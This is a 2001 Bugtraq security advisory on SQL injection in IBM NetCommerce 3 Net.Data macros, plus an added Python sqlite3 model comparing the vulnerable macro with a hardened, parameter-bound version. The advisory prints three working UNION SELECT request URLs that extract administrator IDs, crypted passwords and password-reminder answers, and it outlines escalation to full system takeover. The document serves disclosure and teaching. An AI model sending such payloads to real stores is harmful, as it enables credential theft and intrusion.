[19012] in bugtraq


IBM NetCommerce Security

daemon@ATHENA.MIT.EDU (rudi carell)
Mon Feb 5 15:32:33 2001

Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID:  <F40LUDA1XiHY5FbEFYa000003eb@hotmail.com>
Date:         Mon, 5 Feb 2001 11:13:10 -0700
Reply-To: rudi carell <rudicarell@HOTMAIL.COM>
From: rudi carell <rudicarell@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

Hola friends,

While I was participating in the OpenHack contest I found a couple of
serious security holes within IBM's so-called "NetCommerce" thing, which
seems to be a mixture of WebSphere, Net.Data, servlets, JSPs and DB2?

However.. summary:

class: input validation error
remote: yes
local: yes
vulnerable: IBM NetCommerce 3 (exact version not confirmed)


description:


Besides well-known WebSphere bugs (file disclosure and default admin
passwords) ...

the most dangerous bugs result from NON-existent input validation within
NetCommerce's Net.Data "macros".

By crafting malformed HTTP requests it is possible to extract "any"
NetCommerce database information.

Combining this method with other default NetCommerce functionality
(PasswordReset, for example) it is possible to take hold of so-called
"store-" or "site-manager" accounts.

Once you are an NC administrator you are allowed to use all the admin tools.

At this point you are able to upload and download files, issue operating-system
commands or run any query with the very, very highly privileged DB2INST1 account.

This can lead to a possible takeover of the whole system....


Many default macros are vulnerable to this (classic :-) sort of attack.

exploit:


a few examples:

1) "HowTo find Administrator Accounts"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';

2) "Passwords(crypted)"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

3) "Password-Reminders"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

Of course "orderdspc.d2w" is not the only vulnerable macro .. it's just an
example. Casting between different data types is possible (read the DB2 man
pages).

It should also be possible (not proven) to query other databases.


vendor status:

This mail was sent to "ers@ers.ibm.com" last week.
(ERS = emergency response team)


nice day,


rc


rudicarell@hotmail.com
security@freefly.com


<FLAME> Due to the very unprofessional (or should I say unfair) system setup
of the OpenHack servers I was not able to prove the whole concept. </FLAME>

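The following is an added example, not code from the advisory above or from IBM: a small sqlite3 model of the orderdspc.d2w injection shown in the exploit section, with the unvalidated macro beside a hardened one. Everything not taken from the posted URLs is an assumption and is labelled as such in the code: the macro's SQL is taken to be a two-column `SELECT mestname, ortotal FROM orders WHERE order_rn = ...` (two columns because the posted UNION supplies two, `orders` and `ortotal` are made up), the SHOPPER column names come from the URLs but their rows are constructed test data, and sqlite3 stands in for DB2.

```python
"""
Added example (not part of the original advisory): model of the
orderdspc.d2w order_rn injection against constructed sample data.

Assumptions, because the real Net.Data macro is not on the page:
  - the macro's query is taken to be
        SELECT mestname, ortotal FROM orders WHERE order_rn = <order_rn>
    (table ORDERS and column ORTOTAL are made up; two columns match the
    two-column UNION in the posted URLs);
  - SHOPPER columns shlogid/shlpswd/shchaans/shshtyp come from the URLs,
    the row contents below are constructed test data;
  - sqlite3 stands in for DB2, which is enough to show UNION semantics.
"""
import re
import sqlite3
from urllib.parse import unquote_plus


def build_db():
    """Constructed sample data standing in for a NetCommerce database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE shopper (shlogid TEXT, shlpswd TEXT, shchaans TEXT, shshtyp TEXT);
        INSERT INTO shopper VALUES ('ncadmin', 'hash-of-admin-pw', 'first pet', 'A');
        INSERT INTO shopper VALUES ('alice',   'hash-of-alice-pw', 'home town', 'R');
        CREATE TABLE orders (order_rn INTEGER, mestname TEXT, ortotal INTEGER);
        INSERT INTO orders VALUES (1001, 'Example Store', 42);
    """)
    return conn


def order_rn_from_url(url):
    """Pull the raw order_rn parameter out of a request URL and decode it
    the way the CGI layer would ('+' -> space, %3d -> '=')."""
    raw = url.split("order_rn=", 1)[1]
    return unquote_plus(raw)


def vulnerable_report(conn, order_rn):
    """The macro as the advisory describes it: the parameter is pasted
    straight into the SQL text, so a UNION rides along with the query."""
    sql = "SELECT mestname, ortotal FROM orders WHERE order_rn = " + order_rn
    return conn.execute(sql).fetchall()


def hardened_report(conn, order_rn):
    """Same report with the two checks that close the hole: the reference
    number must look like an integer, and it is bound as a parameter rather
    than concatenated, so no query text can come from the client."""
    if not re.fullmatch(r"[0-9]{1,10}", order_rn):
        raise ValueError("order_rn must be a decimal integer")
    sql = "SELECT mestname, ortotal FROM orders WHERE order_rn = ?"
    return conn.execute(sql, (int(order_rn),)).fetchall()


def rejected_by_hardened(conn, order_rn):
    """True if the hardened macro refuses the input outright."""
    try:
        hardened_report(conn, order_rn)
    except ValueError:
        return True
    return False


# Requests 1 and 2 from the advisory (admin login IDs, then the stored
# password of 'ncadmin'), exactly as posted.
ADMIN_URL = ("http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report"
             "?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper"
             "+where+shshtyp+%3d+'A';")
PASSWD_URL = ("http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report"
              "?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper"
              "+where+shlogid+%3d+'ncadmin';")

if __name__ == "__main__":
    db = build_db()
    for url in (ADMIN_URL, PASSWD_URL):
        payload = order_rn_from_url(url)
        print("decoded order_rn :", payload)
        print("vulnerable macro :", vulnerable_report(db, payload))
        print("hardened rejects :", rejected_by_hardened(db, payload))
    print("hardened, legitimate request:", hardened_report(db, "1001"))
```

The point the model makes concrete is why the posted URLs use `99999`: no order carries that number, so the report body is empty and the only rows that come back are the ones the attacker's UNION contributes, rendered in the `mestname` column of the order display. The `,0` pads the UNION to the macro's column count, which is also why the advisory mentions casting: when the second column is not numeric, the attacker has to cast to make the UNION type-compatible.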
